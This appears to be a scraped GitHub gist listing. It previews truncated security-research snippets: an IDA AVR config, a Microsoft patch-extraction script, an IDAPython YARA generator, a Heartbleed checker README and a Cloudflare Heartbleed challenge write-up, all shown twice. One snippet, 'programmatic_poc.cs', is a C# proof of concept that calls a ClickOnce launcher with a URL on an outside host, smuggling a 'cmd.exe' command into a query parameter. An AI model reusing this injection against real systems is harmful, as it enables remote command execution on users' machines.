poxyran

## avr.cfg
.ATmega328
; Ida avr.cfg (c) THANATOS

SUBARCH=5

RAM=2048
ROM=32768
EEPROM=1024

; MEMORY MAP

## PatchExtract125.ps1
<#
================
PATCHEXTRACT.PS1
=================
Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)

This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.

Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64)
as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will

## programmatic_poc.cs
using System;
using System.Runtime.InteropServices;

class DPPwned {

	[DllImport("dfshim.dll")]
	public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);

	public static void Main() {
		LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);

## yara_fn.py
'''
IDAPython script that generates a YARA rule to match against the
basic blocks of the current function. It masks out relocation bytes
and ignores jump instructions (given that we're already trying to
match compiler-specific bytes, this is of arguable benefit).

If python-yara is installed, the IDAPython script also validates that
the generated rule matches at least one segment in the current file.

author: Willi Ballenthin <william.ballenthin@fireeye.com>

## README.md

      
              2 files
            
          
              5 forks
            
          
              17 comments
            
          
              25 stars
            
          
                ah8r
                / README.md
            
            
              Last active
              June 7, 2020 19:51
            
              
                Hut3 Cardiac Arrest (compatible with Python 2.7)
              
          
    Cardiac Arrest

Hut3 Cardiac Arrest - A script to check OpenSSL servers for the Heartbleed bug (CVE-2014-0160).
Note: This code was originally a GitHub Gist but has been copied to a full GitHub Repository so issues can also be tracked. Both will be kept updated with the latest code revisions.
DISCLAIMER: There have been unconfirmed reports that this script can render HP iLO unresponsive. This script complies with the TLS specification, so responsitivity issues are likely the result of a bad implementation of TLS on the server side. CNS Hut3 and Adrian Hayter do not accept responsibility if this script crashes a server you test it against. USE IT AT YOUR OWN RISK. As always, the correct way to test for the vulnerability is to check the version of OpenSSL installed on the server in question. OpenSSL 1.0.1 through 1.0.1f are vulnerable.
This script has several advantages over similar scripts that have been re

  
## cloudflare_challenge
I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
10th to get it (ok, looks like I was the 8th.) But I'm happy that I was able to prove to myself
that I too could do it.

First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
believed that it would be highly improbable under normal conditions to obtain the private key
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
extract private keys. So I wanted to see first-hand if it was possible or not.
	.ATmega328
	; Ida avr.cfg (c) THANATOS

	SUBARCH=5

	RAM=2048
	ROM=32768
	EEPROM=1024

	; MEMORY MAP
	<#
	================
	PATCHEXTRACT.PS1
	=================
	Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)

	This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.

	Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64)
	as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will
	using System;
	using System.Runtime.InteropServices;

	class DPPwned {

	[DllImport("dfshim.dll")]
	public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);

	public static void Main() {
	LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
	'''
	IDAPython script that generates a YARA rule to match against the
	basic blocks of the current function. It masks out relocation bytes
	and ignores jump instructions (given that we're already trying to
	match compiler-specific bytes, this is of arguable benefit).

	If python-yara is installed, the IDAPython script also validates that
	the generated rule matches at least one segment in the current file.

	author: Willi Ballenthin <william.ballenthin@fireeye.com>
	I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
	10th to get it (ok, looks like I was the 8th.) But I'm happy that I was able to prove to myself
	that I too could do it.

	First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
	believed that it would be highly improbable under normal conditions to obtain the private key
	through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
	challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
	extract private keys. So I wanted to see first-hand if it was possible or not.